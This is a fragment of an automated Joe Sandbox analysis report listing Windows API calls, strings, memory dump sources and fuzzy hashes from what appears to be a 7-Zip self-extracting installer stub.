                                              • Associated: 00000007.00000002.1407746255.0000000000432000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_7_2_400000_file.jbxd
                                              Similarity
                                              • API ID: ErrorLast_beginthreadex
                                              • String ID:
                                              • API String ID: 4034172046-0
                                              • Opcode ID: e5ca857e6cae9760b500a95e192be9ea992c298de85bf840c792a1269a380ec9
                                              • Instruction ID: fe95790bd269afcad05a26a3721163fc0b830ac61c9b3c5b6bbddf8a66cf2d64
                                              • Opcode Fuzzy Hash: e5ca857e6cae9760b500a95e192be9ea992c298de85bf840c792a1269a380ec9
                                              • Instruction Fuzzy Hash: 12D05EF6400208BFDF01DFE0DC05CAB3BADEB08204B004464FD05C2150E632DA108B60
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.1407693664.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000007.00000002.1407677693.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000007.00000002.1407713915.0000000000413000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000007.00000002.1407730153.0000000000417000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000007.00000002.1407746255.000000000041A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000007.00000002.1407746255.0000000000432000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_7_2_400000_file.jbxd
                                              Similarity
                                              • API ID: H_prolog
                                              • String ID:
                                              • API String ID: 3519838083-0
                                              • Opcode ID: e8864bf39b3a1c941500cd6d38dedcba990c3b7db4eb5411aa9ab2a8414fad35
                                              • Instruction ID: 312fbe8762c42e8d4a239ae194adb86e93363bc1e5443e54fb58aca6058f63a2
                                              • Opcode Fuzzy Hash: e8864bf39b3a1c941500cd6d38dedcba990c3b7db4eb5411aa9ab2a8414fad35
                                              • Instruction Fuzzy Hash: 70D05EB2A04108FBE7109F85D946BEEFB78EB80399F10823FB506B1150D7BC5A0196AD
                                              APIs
                                              • ReadFile.KERNELBASE(?,?,?,00000000,00000000), ref: 0040DAF2
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.1407693664.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000007.00000002.1407677693.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000007.00000002.1407713915.0000000000413000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000007.00000002.1407730153.0000000000417000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000007.00000002.1407746255.000000000041A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000007.00000002.1407746255.0000000000432000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_7_2_400000_file.jbxd
                                              Similarity
                                              • API ID: FileRead
                                              • String ID:
                                              • API String ID: 2738559852-0
                                              • Opcode ID: 05e1a1911e5ec75f7d6758f34865a5827037a9c860dec67033daab0b9cfe5943
                                              • Instruction ID: c05821c64f4412cbb188b0f884d423eaa3d686fb1c941f6ac6705c8b1bb703da
                                              • Opcode Fuzzy Hash: 05e1a1911e5ec75f7d6758f34865a5827037a9c860dec67033daab0b9cfe5943
                                              • Instruction Fuzzy Hash: 58E0EC75211208FFDB01CF90CD01FDE7BBDFB49755F208058E90596160C7759A10EB54
                                              APIs
                                              • FindCloseChangeNotification.KERNELBASE(00000001,000000FF,0040DA61,00413330,?,0040DB39,L@,40000000,00000000,00000000,00000000,0040DB50,00000000,00000001,00000001,00000080), ref: 0040D990
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.1407693664.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000007.00000002.1407677693.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000007.00000002.1407713915.0000000000413000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000007.00000002.1407730153.0000000000417000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000007.00000002.1407746255.000000000041A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000007.00000002.1407746255.0000000000432000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_7_2_400000_file.jbxd
                                              Similarity
                                              • API ID: ChangeCloseFindNotification
                                              • String ID:
                                              • API String ID: 2591292051-0
                                              • Opcode ID: 5a1e794e604a6db35733be3680912b24c50de2529967425d082228c541f5af6f
                                              • Instruction ID: 71cfb53d0268b44c797f7400575dcc0518408263689e7c465582b3111ebcfb94
                                              • Opcode Fuzzy Hash: 5a1e794e604a6db35733be3680912b24c50de2529967425d082228c541f5af6f
                                              • Instruction Fuzzy Hash: 95D0127251422156CF646E7CB8849C277D85A06334335176AF0B4E32E4D3749DCB5698
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.1407693664.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000007.00000002.1407677693.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000007.00000002.1407713915.0000000000413000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000007.00000002.1407730153.0000000000417000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000007.00000002.1407746255.000000000041A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000007.00000002.1407746255.0000000000432000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_7_2_400000_file.jbxd
                                              Similarity
                                              • API ID: ??3@
                                              • String ID:
                                              • API String ID: 613200358-0
                                              • Opcode ID: e2884d5c4436d752aeb19b459afcf7a21ebda84ca54877994c053e4b1708ebbb
                                              • Instruction ID: 4f8625dd4754cd58134d11a263ca8d259b443881af5e9d09f346c6a8c73fbf37
                                              • Opcode Fuzzy Hash: e2884d5c4436d752aeb19b459afcf7a21ebda84ca54877994c053e4b1708ebbb
                                              • Instruction Fuzzy Hash: 38D092B15197108EC3A4EF7AA8014867BE0AB04324321C97FA05AE3A60E679E8919B48
                                              APIs
                                              • SetFileTime.KERNELBASE(?,?,?,?,0040DB94,00000000,00000000,?,0040123C,?), ref: 0040DB78
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.1407693664.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000007.00000002.1407677693.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000007.00000002.1407713915.0000000000413000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000007.00000002.1407730153.0000000000417000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000007.00000002.1407746255.000000000041A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000007.00000002.1407746255.0000000000432000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_7_2_400000_file.jbxd
                                              Similarity
                                              • API ID: FileTime
                                              • String ID:
                                              • API String ID: 1425588814-0
                                              • Opcode ID: d3a1cd3220883f1d47adb6259c26a1719b9664e7d8bae69288c7dd66fbb4bdaa
                                              • Instruction ID: c6000770aa4fb4c72b4925fc402daec6625791e8065b7518697746b49206ca3e
                                              • Opcode Fuzzy Hash: d3a1cd3220883f1d47adb6259c26a1719b9664e7d8bae69288c7dd66fbb4bdaa
                                              • Instruction Fuzzy Hash: 40C04C3A199105FF8F020F70CD04C1ABBA2AB95722F10C918B199C4070CB328424EB02
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.1407693664.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000007.00000002.1407677693.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000007.00000002.1407713915.0000000000413000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000007.00000002.1407730153.0000000000417000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000007.00000002.1407746255.000000000041A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000007.00000002.1407746255.0000000000432000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_7_2_400000_file.jbxd
                                              Similarity
                                              • API ID: ??2@
                                              • String ID:
                                              • API String ID: 1033339047-0
                                              • Opcode ID: 8955cc1b29c93d01701bbb2481471dd0eaf8a49c35f18cc8a7d41221c9f85a6f
                                              • Instruction ID: 1ceb60bf2594cd826c4dcd58ac8a3e75a9726935558582f6c117c88f0dd7e0c4
                                              • Opcode Fuzzy Hash: 8955cc1b29c93d01701bbb2481471dd0eaf8a49c35f18cc8a7d41221c9f85a6f
                                              • Instruction Fuzzy Hash: 4A219372A042858FCF30FF91D98096B77A5AF50358320853FE093732C1DA38AD49D75A
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.1407693664.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000007.00000002.1407677693.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000007.00000002.1407713915.0000000000413000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000007.00000002.1407730153.0000000000417000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000007.00000002.1407746255.000000000041A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000007.00000002.1407746255.0000000000432000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_7_2_400000_file.jbxd
                                              Similarity
                                              • API ID: free
                                              • String ID:
                                              • API String ID: 1294909896-0
                                              • Opcode ID: ad693850b0beb581ae9f70f91648a78de6b85f526a16152dd36665cc48ec9015
                                              • Instruction ID: 8ccd5c106adaedd21fdabd868c2a091acccb285e2c6396e7c66228af9079aab7
                                              • Opcode Fuzzy Hash: ad693850b0beb581ae9f70f91648a78de6b85f526a16152dd36665cc48ec9015
                                              • Instruction Fuzzy Hash: 68E0ED311087008BEB74DA38A941F97B3DAAB14314F15893FE89AE7690EB74FC448A59
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.1407693664.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000007.00000002.1407677693.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000007.00000002.1407713915.0000000000413000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000007.00000002.1407730153.0000000000417000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000007.00000002.1407746255.000000000041A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000007.00000002.1407746255.0000000000432000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_7_2_400000_file.jbxd
                                              Similarity
                                              • API ID: ??2@
                                              • String ID:
                                              • API String ID: 1033339047-0
                                              • Opcode ID: a7abc97568459436273e1f083447e626332fd1c69ee6784c82a7404474e7416c
                                              • Instruction ID: 194059228ff5733793a196764ebf5a0b63d959e09992ce12dff2d54d27d13516
                                              • Opcode Fuzzy Hash: a7abc97568459436273e1f083447e626332fd1c69ee6784c82a7404474e7416c
                                              • Instruction Fuzzy Hash: 67D0A9313083121ADA5432320A09AAF84848B503A0F10083FB800A32D1DCBE8C81A299
                                              APIs
                                              • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004,0040E4D6,00020000,00000000,?,00000000,?,0040D92B,?,?,00000000,?,0040D96E), ref: 004024E0
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.1407693664.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000007.00000002.1407677693.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000007.00000002.1407713915.0000000000413000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000007.00000002.1407730153.0000000000417000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000007.00000002.1407746255.000000000041A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000007.00000002.1407746255.0000000000432000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_7_2_400000_file.jbxd
                                              Similarity
                                              • API ID: AllocVirtual
                                              • String ID:
                                              • API String ID: 4275171209-0
                                              • Opcode ID: 076169c5b403ddfe74b0b9752022086d8412a0b80d08fe31e2627fee67d73aef
                                              • Instruction ID: 23ad038ad5ccaf642d49e1102795c1c714580f299e31bec6e074b0e2bc220d86
                                              • Opcode Fuzzy Hash: 076169c5b403ddfe74b0b9752022086d8412a0b80d08fe31e2627fee67d73aef
                                              • Instruction Fuzzy Hash: D3C080301443007DED115F505E06B463A916B44717F508065F344540D0C7F484009509
                                              APIs
                                              • VirtualFree.KERNELBASE(00000000,00000000,00008000,0040E561,?,00000004,0040E5B0,?,?,004117E5,?), ref: 00401B2A
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.1407693664.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000007.00000002.1407677693.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000007.00000002.1407713915.0000000000413000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000007.00000002.1407730153.0000000000417000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000007.00000002.1407746255.000000000041A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000007.00000002.1407746255.0000000000432000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_7_2_400000_file.jbxd
                                              Similarity
                                              • API ID: FreeVirtual
                                              • String ID:
                                              • API String ID: 1263568516-0
                                              • Opcode ID: 727c456c664ec040fae2a494910ef8e866b16c48e489126d85a402f0e100615f
                                              • Instruction ID: 5381ed20748db0b7fd93371e38984c83fa4171db9cf80dc6a42123bab5888d64
                                              • Opcode Fuzzy Hash: 727c456c664ec040fae2a494910ef8e866b16c48e489126d85a402f0e100615f
                                              • Instruction Fuzzy Hash: 45A002305446007ADE515B10DD05F457F516744B11F20C5547155540E586755654DA09
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.1407693664.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000007.00000002.1407677693.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000007.00000002.1407713915.0000000000413000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000007.00000002.1407730153.0000000000417000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000007.00000002.1407746255.000000000041A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000007.00000002.1407746255.0000000000432000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_7_2_400000_file.jbxd
                                              Similarity
                                              • API ID: free
                                              • String ID:
                                              • API String ID: 1294909896-0
                                              • Opcode ID: d9246d09a93a321ccd45a7f77b4b3a05b9734a8e70a1dc2b954ba7e43b8076d7
                                              • Instruction ID: 7baee4be7330d58fba6a4d3e6254b3dabd4481adb37f3967e502ba2394f26960
                                              • Opcode Fuzzy Hash: d9246d09a93a321ccd45a7f77b4b3a05b9734a8e70a1dc2b954ba7e43b8076d7
                                              • Instruction Fuzzy Hash:
                                              APIs
                                              • _wtol.MSVCRT(00404F9B,00000000,00417794), ref: 004034E5
                                              • SHGetSpecialFolderPathW.SHELL32(00000000,?,CC5BE863,00000000,004177A0,00000000,00417794), ref: 00403588
                                              • ??3@YAXPAX@Z.MSVCRT ref: 004035F9
                                              • ??3@YAXPAX@Z.MSVCRT ref: 00403601
                                              • ??3@YAXPAX@Z.MSVCRT ref: 00403609
                                              • ??3@YAXPAX@Z.MSVCRT ref: 00403611
                                              • ??3@YAXPAX@Z.MSVCRT ref: 00403619
                                              • ??3@YAXPAX@Z.MSVCRT ref: 00403621
                                              • ??3@YAXPAX@Z.MSVCRT ref: 00403629
                                              • _wtol.MSVCRT(?,00000000,?,00000000,?,00000000,?,00000000,?,00000000,?,00000000,?,00000000,?,?), ref: 0040367F
                                              • CoCreateInstance.OLE32(00414BF4,00000000,00000001,00414BE4,00404F9B,.lnk,?,0000005C), ref: 00403720
                                              • ??3@YAXPAX@Z.MSVCRT ref: 004037B8
                                              • ??3@YAXPAX@Z.MSVCRT ref: 004037C0
                                              • ??3@YAXPAX@Z.MSVCRT ref: 004037C8
                                              • ??3@YAXPAX@Z.MSVCRT ref: 004037D0
                                              • ??3@YAXPAX@Z.MSVCRT ref: 004037D8
                                              • ??3@YAXPAX@Z.MSVCRT ref: 004037E0
                                              • ??3@YAXPAX@Z.MSVCRT ref: 004037E8
                                              • ??3@YAXPAX@Z.MSVCRT ref: 004037EE
                                              • ??3@YAXPAX@Z.MSVCRT ref: 004037F6
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.1407693664.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000007.00000002.1407677693.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000007.00000002.1407713915.0000000000413000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000007.00000002.1407730153.0000000000417000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000007.00000002.1407746255.000000000041A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000007.00000002.1407746255.0000000000432000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_7_2_400000_file.jbxd
                                              Similarity
                                              • API ID: ??3@$_wtol$CreateFolderInstancePathSpecial
                                              • String ID: .lnk
                                              • API String ID: 408529070-24824748
                                              • Opcode ID: e80c2c7c9c30337434ae202b9345f2bbae47067eadd3a6865f328b5d077d7d03
                                              • Instruction ID: c4a1d47ac56633071a1bd2db01059e5edb54ffe0bccc65637149caefe5d2277b
                                              • Opcode Fuzzy Hash: e80c2c7c9c30337434ae202b9345f2bbae47067eadd3a6865f328b5d077d7d03
                                              • Instruction Fuzzy Hash: 8EA18A71910219ABDF04EFA1CC46DEEBB79EF44705F50442AF502B71A1EB79AA81CB18
                                              APIs
                                              • GetLastError.KERNEL32(00000000,00000020,?), ref: 00401FEC
                                              • wsprintfW.USER32 ref: 00401FFD
                                              • GetEnvironmentVariableW.KERNEL32(?,00000000,00000000), ref: 00402012
                                              • GetLastError.KERNEL32 ref: 00402017
                                              • ??2@YAPAXI@Z.MSVCRT ref: 00402032
                                              • GetEnvironmentVariableW.KERNEL32(?,00000000,?), ref: 00402045
                                              • GetLastError.KERNEL32 ref: 0040204C
                                              • lstrcmpiW.KERNEL32(00000000,00000020), ref: 00402061
                                              • ??3@YAXPAX@Z.MSVCRT ref: 00402071
                                              • ??3@YAXPAX@Z.MSVCRT ref: 0040208F
                                              • SetLastError.KERNEL32(00000000), ref: 00402098
                                              • lstrlenA.KERNEL32(00413FD0), ref: 004020CC
                                              • ??2@YAPAXI@Z.MSVCRT ref: 004020E7
                                              • GetLocaleInfoW.KERNEL32(?,00001004,?,0000001F), ref: 00402119
                                              • _wtol.MSVCRT(?), ref: 0040212A
                                              • MultiByteToWideChar.KERNEL32(00000000,00413FD0,00000001,00000000,00000002), ref: 0040214A
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.1407693664.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000007.00000002.1407677693.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000007.00000002.1407713915.0000000000413000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000007.00000002.1407730153.0000000000417000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000007.00000002.1407746255.000000000041A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000007.00000002.1407746255.0000000000432000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_7_2_400000_file.jbxd
                                              Similarity
                                              • API ID: ErrorLast$??2@??3@EnvironmentVariable$ByteCharInfoLocaleMultiWide_wtollstrcmpilstrlenwsprintf
                                              • String ID: 7zSfxString%d$XpA$\3A
                                              • API String ID: 2117570002-3108448011
                                              • Opcode ID: 00d9f3dbaef60b25cb29ca3c9b71c285db7f1e31c7e22736623b1f08098a1b6c
                                              • Instruction ID: 5c0681f152172bce6659d4e02be164ba9bb36eab7c70e8d4f1a0ed4420d73572
                                              • Opcode Fuzzy Hash: 00d9f3dbaef60b25cb29ca3c9b71c285db7f1e31c7e22736623b1f08098a1b6c
                                              • Instruction Fuzzy Hash: 11518471604305AFDB209F74DD899DBBBB9EB08345B11407AF646E62E0E774AA44CB18
                                              APIs
                                              • GetModuleHandleW.KERNEL32(00000000), ref: 00401BEA
                                              • FindResourceExA.KERNEL32(00000000,?,?,00000000), ref: 00401C07
                                              • FindResourceExA.KERNEL32(00000000,?,?,00000409), ref: 00401C1B
                                              • SizeofResource.KERNEL32(00000000,00000000), ref: 00401C2C
                                              • LoadResource.KERNEL32(00000000,00000000), ref: 00401C36
                                              • LockResource.KERNEL32(00000000), ref: 00401C41
                                              • LoadLibraryA.KERNEL32(kernel32,SetProcessPreferredUILanguages), ref: 00401C6D
                                              • GetProcAddress.KERNEL32(00000000), ref: 00401C76
                                              • wsprintfW.USER32 ref: 00401C95
                                              • LoadLibraryA.KERNEL32(kernel32,SetThreadPreferredUILanguages), ref: 00401CAA
                                              • GetProcAddress.KERNEL32(00000000), ref: 00401CAD
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.1407693664.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000007.00000002.1407677693.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000007.00000002.1407713915.0000000000413000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000007.00000002.1407730153.0000000000417000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000007.00000002.1407746255.000000000041A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000007.00000002.1407746255.0000000000432000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_7_2_400000_file.jbxd
                                              Similarity
                                              • API ID: Resource$Load$AddressFindLibraryProc$HandleLockModuleSizeofwsprintf
                                              • String ID: %04X%c%04X%c$SetProcessPreferredUILanguages$SetThreadPreferredUILanguages$kernel32
                                              • API String ID: 2639302590-365843014
                                              • Opcode ID: a5d0d847a20e007311d4afefc35bdd0d1043cb70ace8406c3a5a944bd10805b9
                                              • Instruction ID: 1b367ad183524107b1556f539f271e2bfa11f4d2ebd4ebc35158efee647c5c94
                                              • Opcode Fuzzy Hash: a5d0d847a20e007311d4afefc35bdd0d1043cb70ace8406c3a5a944bd10805b9
                                              • Instruction Fuzzy Hash: 002153B1944318BBDB109FA59D48F9B7FBCEB48751F118036FA05B72D1D678DA008BA8
                                              APIs
                                              • wvsprintfW.USER32(?,00000000,?), ref: 0040779A
                                              • GetLastError.KERNEL32(?,00000000,0000FDE9), ref: 004077AB
                                              • FormatMessageW.KERNEL32(00001100,00000000,00000000,00402A50,00402A50,00000000,00000000,?,00000000,0000FDE9), ref: 004077D3
                                              • FormatMessageW.KERNEL32(00001100,00000000,00402A50,00000000,00402A50,00000000,00000000,?,00000000,0000FDE9), ref: 004077E8
                                              • lstrlenW.KERNEL32(?,?,00000000,0000FDE9), ref: 004077FB
                                              • lstrlenW.KERNEL32(00402A50,?,00000000,0000FDE9), ref: 00407802
                                              • ??2@YAPAXI@Z.MSVCRT ref: 00407817
                                              • lstrcpyW.KERNEL32(00000000,?), ref: 0040782D
                                              • lstrcpyW.KERNEL32(-00000002,00402A50), ref: 0040783E
                                              • ??3@YAXPAX@Z.MSVCRT ref: 00407847
                                              • LocalFree.KERNEL32(00402A50,?,00000000,0000FDE9), ref: 00407851
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.1407693664.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000007.00000002.1407677693.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000007.00000002.1407713915.0000000000413000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000007.00000002.1407730153.0000000000417000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000007.00000002.1407746255.000000000041A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000007.00000002.1407746255.0000000000432000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_7_2_400000_file.jbxd
                                              Similarity
                                              • API ID: FormatMessagelstrcpylstrlen$??2@??3@ErrorFreeLastLocalwvsprintf
                                              • String ID:
                                              • API String ID: 829399097-0
                                              • Opcode ID: ee3daf165df888f8cf12417ee57ec6736150a746ec063280ed1601aaee350fdd
                                              • Instruction ID: 98041b7e574f1f1c61a73cce3db0a13ad597614178cae5aaf21d0c5f67190c53
                                              • Opcode Fuzzy Hash: ee3daf165df888f8cf12417ee57ec6736150a746ec063280ed1601aaee350fdd
                                              • Instruction Fuzzy Hash: 85218172804209BEDF14AFA0DC85CEB7BACEB04355B10847BF506A7150EB34EE848BA4
                                              APIs
                                              • FindFirstFileW.KERNEL32(?,?,00413454,?,?,?,00000000), ref: 00402BA8
                                              • lstrcmpW.KERNEL32(?,00413450,?,0000005C,?,?,?,00000000), ref: 00402BFB
                                              • lstrcmpW.KERNEL32(?,00413448,?,?,00000000), ref: 00402C11
                                              • SetFileAttributesW.KERNEL32(?,00000000,?,0000005C,?,?,?,00000000), ref: 00402C27
                                              • DeleteFileW.KERNEL32(?,?,?,00000000), ref: 00402C2E
                                              • FindNextFileW.KERNEL32(00000000,00000010,?,?,00000000), ref: 00402C40
                                              • FindClose.KERNEL32(00000000,?,?,00000000), ref: 00402C4F
                                              • SetFileAttributesW.KERNEL32(?,00000000,?,?,00000000), ref: 00402C5A
                                              • RemoveDirectoryW.KERNEL32(?,?,?,00000000), ref: 00402C63
                                              • ??3@YAXPAX@Z.MSVCRT ref: 00402C6E
                                              • ??3@YAXPAX@Z.MSVCRT ref: 00402C79
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.1407693664.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000007.00000002.1407677693.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000007.00000002.1407713915.0000000000413000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000007.00000002.1407730153.0000000000417000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000007.00000002.1407746255.000000000041A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000007.00000002.1407746255.0000000000432000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_7_2_400000_file.jbxd
                                              Similarity
                                              • API ID: File$Find$??3@Attributeslstrcmp$CloseDeleteDirectoryFirstNextRemove
                                              • String ID:
                                              • API String ID: 1862581289-0
                                              • Opcode ID: cbe64e3294a226f75371eeebbcc0df377dd8d0393181b43033399503c37d4d64
                                              • Instruction ID: 7ffcf375551190f92b7aba4ef5ef3cd4ed0286f9dec59b0789af02bc25bdcc12
                                              • Opcode Fuzzy Hash: cbe64e3294a226f75371eeebbcc0df377dd8d0393181b43033399503c37d4d64
                                              • Instruction Fuzzy Hash: A321A230500209BAEB10AF61DE4CFBF7B7C9B0470AF14417AB505B11E0EB78DB459A6C
                                              APIs
                                              • LoadLibraryA.KERNEL32(uxtheme,?,00407F57,000004B1,00000000,?,?,?,?,?,0040803E), ref: 00406D65
                                              • GetProcAddress.KERNEL32(00000000,SetWindowTheme), ref: 00406D76
                                              • GetWindow.USER32(?,00000005), ref: 00406D8F
                                              • GetWindow.USER32(00000000,00000002), ref: 00406DA5
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.1407693664.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000007.00000002.1407677693.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000007.00000002.1407713915.0000000000413000.00000002.00000001.01000000.00000004.sdmpDownload File
